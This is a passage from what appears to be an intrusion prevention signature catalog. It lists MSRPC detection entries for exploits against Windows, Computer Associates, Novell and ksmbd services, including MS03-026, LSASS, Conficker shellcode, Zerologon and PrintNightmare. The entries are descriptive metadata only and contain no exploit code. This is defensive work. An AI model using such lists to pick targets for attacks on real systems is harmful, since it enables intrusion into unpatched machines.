Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Threat Manager for the Enterprise, Computer Associates Anti-Virus for the Enterprise, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-152-2032
Last changed: sgpkg-ips-304-4219
Vulnerability: MSRPC_CA-Multiple-Products-Alert-Notification-Server-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-CA-Products-Message-Engine-RPC-Server-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Computer Associates Message Engine
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Computer Associates Business Protection Suite 2, Computer Associates Server Protection Suite 2, Computer Associates BrightStor, CVE2006, Windows not specific, Computer Associates BrightStor not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-CA-Products-Message-Engine-RPC-Server-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Canonical-Ksmbd-Tools-Ksmbd.Mountd-SMB_Read_Sid-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Canonical ksmdb-tools detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Canonical ksmdb-tools, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1651-5242
Vulnerability: Canonical-Ksmbd-Tools-Ksmbd.Mountd-SMB_Read_Sid-Heap-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Conficker-Worm-ShellCode

About this situation: Detected a shellcode used by by W32/Conficker worm
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-215-2032
Last changed: sgpkg-ips-215-2032
Vulnerability: Downandup-Worm-Request
Description:
Back to top

MSRPC-TCP_CPS-DCOM-RPC-Servername-BOF

About this situation: RPC DCOM servername buffer overflow (MS03-26)
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows XP, Windows NT, Windows 2000, Windows 2003, x86, Windows DCOM RPC Service, MS2003, CVE2003, Windows XP not specific, Windows NT not specific, Windows 2000 not specific, Windows 2003 not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: DCOM-RPC-BOF-MS03-026
Description:
Back to top

MSRPC-TCP_CPS-DCOM-Rpcss-Long-Filename-BOF

About this situation: Possible MS03-039 long filename buffer overrun exploit detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows NT 4.0, x86, Windows DCOM RPC Service, MS2003, CVE2003, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows NT 4.0 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-812-5242
Vulnerability: DCOM-Rpcss-Heap-BO-MS03-039
Description:
Back to top

MSRPC-TCP_CPS-Ksmbd-Tools-Ksmbd.Mountd-Ndr_write_bytes-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ksmdb-tools detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Canonical ksmdb-tools, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: Ksmbd-Tools-Ksmbd.Mountd-Ndr_write_bytes-Heap-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-LSASS-BOF

About this situation: Buffer overflow attempt against LSASS
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows 98, Windows ME, Windows 2003, Windows NT 4.0, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, x86, LSASS, MS2004, CVE2003, Windows 2003 not specific, Windows NT 4.0 not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: NetBIOS-LSASS-BOF
Description:
Back to top

MSRPC-TCP_CPS-Message-Queuing-Service-Queue-Name-String-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the Message Queuing Service in Microsoft Windows
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows 2000 SP4, Windows XP SP2, Windows 2000 Server, Any Hardware, MS2007-12, CVE2007, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-175-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-Message-Queuing-Service-Queue-Name-String-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Client-Service-For-NetWare-Memory-Corruption

About this situation: Buffer overflow exploit against the Microsoft Client Service for NetWare
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, MS2006-11, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-595-5211
Vulnerability: MSRPC-Microsoft-Client-Service-For-NetWare-Memory-Corruption
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Endpoint-Mapper-Lookup-Request

About this situation: Microsoft MS-RPC Endpoint Mapper lookup request
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-344-4219
Last changed: sgpkg-ips-589-5211
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Host-Integration-Server-Vulnerable-Interface-Called

About this situation: A request to the vulnerable interface in Microsoft Host Integration Server detected
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Host Integration Server, MS2008-10, CVE2008, Windows not specific, Microsoft Host Integration Server not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-174-2032
Vulnerability: Microsoft-Host-Integration-Server-Remote-Command-Execution-Vulnerability
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-License-Logging-Service-Buffer-Overflow-CVE-2005-0050

About this situation: An attempt to exploit a vulnerability in Microsoft License Logging Service
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows 2000, Any Hardware, MS2005-02, CVE2005, Windows 2000 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: Microsoft-Windows-License-Logging-Service-Buffer-Overflow-CVE-2005-0050
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-License-Logging-Service-Buffer-Overflow-CVE-2005-0050-2

About this situation: An attempt to exploit a vulnerability in Microsoft License Logging Service
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows 2000, Any Hardware, MS2005-02, CVE2005, Windows 2000 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Windows-License-Logging-Service-Buffer-Overflow-CVE-2005-0050
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Message-Queuing-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Microsoft Message Queuing
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Microsoft Message Queuing, MS2005-04, CVE2005, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-175-2032
Last changed: sgpkg-ips-343-4219
Vulnerability: TCP-Microsoft-Message-Queuing-BOF
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Message-Queuing-Service-Queue-Name-Handling

About this situation: An attempt to exploit a vulnerability in Microsoft Message Queue Service detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows 2000 SP4, Any Hardware, Microsoft Message Queuing, MS2008-10, CVE2008, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-175-2032
Last changed: sgpkg-ips-578-5211
Vulnerability: Microsoft-Message-Queuing-Service-Queue-Name-Handling-Memory-Corruption
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Netlogon-RPC-Null-Deference-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Netlogon service
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, Any Hardware, MS2010-12, CVE2010, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: Microsoft-Netlogon-RPC-Null-Deference-Denial-Of-Service-CVE-2010-2742
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Print-Service-Impersonation-CVE-2010-2729

About this situation: An attempt to exploit a vulnerability in Microsoft Print Spooler Service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2010-09, CVE2010, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-931-5242
Vulnerability: Microsoft-Print-Service-Impersonation-CVE-2010-2729
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Print-Service-Usage-CVE-2010-2729

About this situation: An attempt to use a potentially vulnerable Microsoft Print Spooler Service
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2010-09, CVE2010, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-689-5211
Vulnerability: Microsoft-Print-Service-Impersonation-CVE-2010-2729
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow

About this situation: Buffer overflow exploit against Microsoft Print Spooler service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, MS2005-08, CVE2005, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: HTTP-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow-1

About this situation: Buffer overflow exploit against Microsoft Print Spooler service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, MS2005-08, CVE2005, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-127-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: HTTP-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-AddPrinterEx-Buffer-Overflow

About this situation: Buffer overflow exploit against Microsoft Print Spooler service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, MS2005-08, CVE2005, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-344-4219
Last changed: sgpkg-ips-344-4219
Vulnerability: HTTP-Microsoft-Print-Spooler-Service-AddPrinter-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Print-Spooler-Service-RpcGetPrinterData-Function-DoS

About this situation: Denial of service exploit against Microsoft Print Spooler service detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows 2000, x86, CVE2006, Windows 2000 not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: Microsoft-Print-Spooler-Service-RpcGetPrinterData-Function-DoS
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-RPC-AsyncOpenPrinter-Request

About this situation: Microsoft RPC AsyncOpenPrinter request detected
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1703-5242
Last changed: sgpkg-ips-1703-5242
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-RPC-OpenPrinter-Request

About this situation: Microsoft RPC OpenPrinter request detected
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-536-5211
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-RPC-OpenPrinterEx-Request

About this situation: Microsoft RPC OpenPrinterEx request detected
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-589-5211
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-CVE-2008-4250-Exploit-Shellcode

About this situation: A Shellcode string associated with an exploit for CVE-2008-4250 was detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, MS2008-10, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-930-5242
Vulnerability: Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-DNS-Server-RPC-Management-Interface-BOF

About this situation: Buffer overflow exploit against Microsoft Windows Domain Name System Server services detected
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows 2003, Windows 2000 Server, Windows 2000 Advanced Server, Windows 2000 Datacenter Server, x86, MS2007-05, CVE2007, Windows 2003 not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: Microsoft-Windows-DNS-Server-RPC-Management-Interface-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1282-5242
Vulnerability: Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1370-5242
Vulnerability: Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Rdl-Service-Base24-Decoding-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1779-5242
Last changed: sgpkg-ips-1779-5242
Vulnerability: Microsoft-Windows-Rdl-Service-Base24-Decoding-Remote-Code-Execution
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Rdl-Service-Tlsrpcchallengeserver-Handling-Two-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: Microsoft-Windows-Rdl-Service-Tlsrpcchallengeserver-Handling-Two-Vulnerabilities
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Remote-Desktop-Licensing-Service-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Vulnerability: Microsoft-Windows-Remote-Desktop-Licensing-Service-Arbitrary-File-Deletion
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-RRAS-Memory-Corruption

About this situation: Detects buffer overflow exploits against Microsoft RRAS service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, MS2006-06, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-Microsoft-Windows-RRAS-Memory-Corruption
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-RRAS-Memory-Corruption-2

About this situation: Detects buffer overflow exploits against Microsoft RRAS service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, MS2006-06, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-Microsoft-Windows-RRAS-Memory-Corruption
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Server-Service-Buffer-Overrun

About this situation: Buffer overflow exploit against Microsoft Server Service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, MS2006-08, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-Microsoft-Windows-Server-Service-Buffer-Overrun
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Server-Service-NetPathCompare-Buffer-Overrun

About this situation: Buffer overflow exploit against Microsoft Server Service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, MS2008-10, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-178-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Svcctl-ChangeServiceConfig2A-Memory-Corruption

About this situation: Memory corruption exploit against Microsoft Windows detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows 2000, x86, Windows 2000 not specific, Denial of Service, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-Microsoft-Windows-Svcctl-ChangeServiceConfig2A-Memory-Corruption
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-WKSSVC-Path-Memory-Corruption

About this situation: MSRPC Windows Workstation Service path validation memory corruption vulnetability
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, MS2008-10, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-185-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Workstation-Service-BOF-MS06-070

About this situation: Detected exploit on MS06-070
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows XP, Windows 2000, x86, MS2006-11, CVE2006, Windows XP not specific, Windows 2000 not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-508-5211
Vulnerability: MSRPC-Workstation-Service-Buffer-Overflow-MS06-070
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Workstation-Service-BOF-MS06-070-2

About this situation: Detected exploit on NetrJoinDomain Account Name
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows XP, Windows 2000, x86, MS2006-11, CVE2006, Windows XP not specific, Windows 2000 not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-508-5211
Vulnerability: MSRPC-Workstation-Service-Buffer-Overflow-MS06-070
Description:
Back to top

MSRPC-TCP_CPS-Microsoft-Windows-Workstation-Service-NetrWkstaUserEnum-DoS

About this situation: Detects denial of service attempts against Microsoft Windows Workstation Service
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows XP 64-bit, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, x86, CVE2006, Windows XP 64-bit not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-143-2032
Last changed: sgpkg-ips-667-5211
Vulnerability: Microsoft-Windows-Workstation-Service-NetrWkstaUserEnum-DoS
Description:
Back to top

MSRPC-TCP_CPS-MS-RPC-DCOM-Interface-DoS-MS03-039

About this situation: Denial of Service attack against Windows RPC DCOM Interface
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows 2000 SP3, Windows 2000 SP4, x86, Windows DCOM RPC Service, MS2003, CVE2003, Denial of Service, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MS-RPC-DCOM-Interface-DoS-MS03-039
Description:
Back to top

MSRPC-TCP_CPS-MS-RPC-DCOM-Interface-DoS-MS03-039-2

About this situation: Denial of Service attack against Windows RPC DCOM Interface
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows 2000 SP3, Windows 2000 SP4, x86, Windows DCOM RPC Service, MS2003, CVE2003, Suspected Denial of Service, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: MS-RPC-DCOM-Interface-DoS-MS03-039
Description:
Back to top

MSRPC-TCP_CPS-MS-RPC-Endpoint-Mapper-DoS-MS03-010

About this situation: Buffer overflow attempt against MS RPC endpoint mapper
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows XP, Windows 2000, Windows NT 4.0, x86, RPC, MS2003, CVE2002, Windows XP not specific, Windows 2000 not specific, Windows NT 4.0 not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MS-RPC-Endpoint-Mapper-DoS-MS03-010
Description:
Back to top

MSRPC-TCP_CPS-MS-SQL-Server-XPs-Srv-Paraminfo-BOF

About this situation: Buffer overflow attempt against MSSQL Server using Extended Stored Procedure
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server, MS2000, CVE2000, Windows not specific, Microsoft SQL Server not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSSQL-NetBIOS-MS-SQL-Server-Xp-Displayparamstmt-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Printstatements-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Peekqueue-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Proxiedmetadata-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Updatecolvbm-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Showcolv-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Enumresultset-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-SetSQLSecurity-BOF
Description:
Back to top

MSRPC-TCP_CPS-MSDTC-BuildContextW-Memory-Corruption-2

About this situation: Detects attacks against Microsoft Distributed Transaction Coordinator
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Microsoft Windows Distributed Transaction Coordinator, MS2005-10, CVE2005, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-783-5211
Vulnerability: Generic-MSDTC-BuildContextW-Memory-Corruption
Description:
Back to top

MSRPC-TCP_CPS-NetDDE-Remote-Buffer-Overflow-MS04-031

About this situation: Attempt to exploit an buffer overflow vulnerability in Microsoft Windows NetDDE
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows NetDDE service, MS2004-10, CVE2004, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MS-NetDDE-Remote-Buffer-Overflow-MS04-031
Description:
Back to top

MSRPC-TCP_CPS-Novell-Client-Print-Provider-Buffer-Overflow

About this situation: Buffer overflow exploit against the Novell Client Print Provider module
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, Novell Client, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-466-5211
Vulnerability: MSRPC-Novell-Client-Print-Provider-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Novell-Client-Print-Provider-RPC-Stack-Buffer-Overflow

About this situation: Buffer overflow exploit against the Novell Client for Windows detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Novell Client, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-Novell-Client-Print-Provider-RPC-Stack-Buffer-Overflow
MSRPC-Novell-Client-nwspool.dll-EnumPrinters-Function-Stack-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-PnP-Denial-Of-Service-Via-SRVSVC-NetrDfsCreateExitPoint

About this situation: Denial of service exploit against Microsoft PNP service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, CVE2005, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-PnP-GetDeviceList-Large-Output-Buffer-Denial-Of-Service
Description:
Back to top

MSRPC-TCP_CPS-PnP-GetDeviceList-And-GetDeviceListSize-BOF

About this situation: Detects malformed input to PnP services GetDeviceList and GetDeviceListSize methods
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, UPnP, MS2005-10, CVE2005, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-PnP-GetDeviceList-And-GetDeviceListSize-BOF
Description:
Back to top

MSRPC-TCP_CPS-PnP-GetDeviceList-DoS

About this situation: Detects malformed input to PnP services GetDeviceList method
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, x86, UPnP, MS2005-10, CVE2005, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-PnP-GetDeviceList-And-GetDeviceListSize-BOF
Description:
Back to top

MSRPC-TCP_CPS-PnP-GetDeviceList-Large-Output-Buffer-Denial-Of-Service

About this situation: Denial of service exploit against Microsoft PNP service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, CVE2005, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-PnP-GetDeviceList-Large-Output-Buffer-Denial-Of-Service
Description:
Back to top

MSRPC-TCP_CPS-PnP-MSDTC-BuildContextW-Denial-Of-Service

About this situation: Denial of service exploit against Microsoft MSDTC BuildContextW function
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, MS2006-05, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: Generic-MSDTC-BuildContextW-Denial-Of-Service
Description:
Back to top

MSRPC-TCP_CPS-Remote-Registry-Request-DoS

About this situation: Remote registry request denial of service
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows NT 4.0, Any Hardware, MS2000, CVE2000, Windows NT 4.0 not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: NetBIOS-Remote-Registry-Request-DoS-MS00-040
Description:
Back to top

MSRPC-TCP_CPS-Request-Without-Bind

About this situation: Detected a Microsoft RPC request without bind to a interface
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-350-4219
Last changed: sgpkg-ips-350-4219
Description:
Back to top

MSRPC-TCP_CPS-Rpc445-Locator-BOF-MS03-001
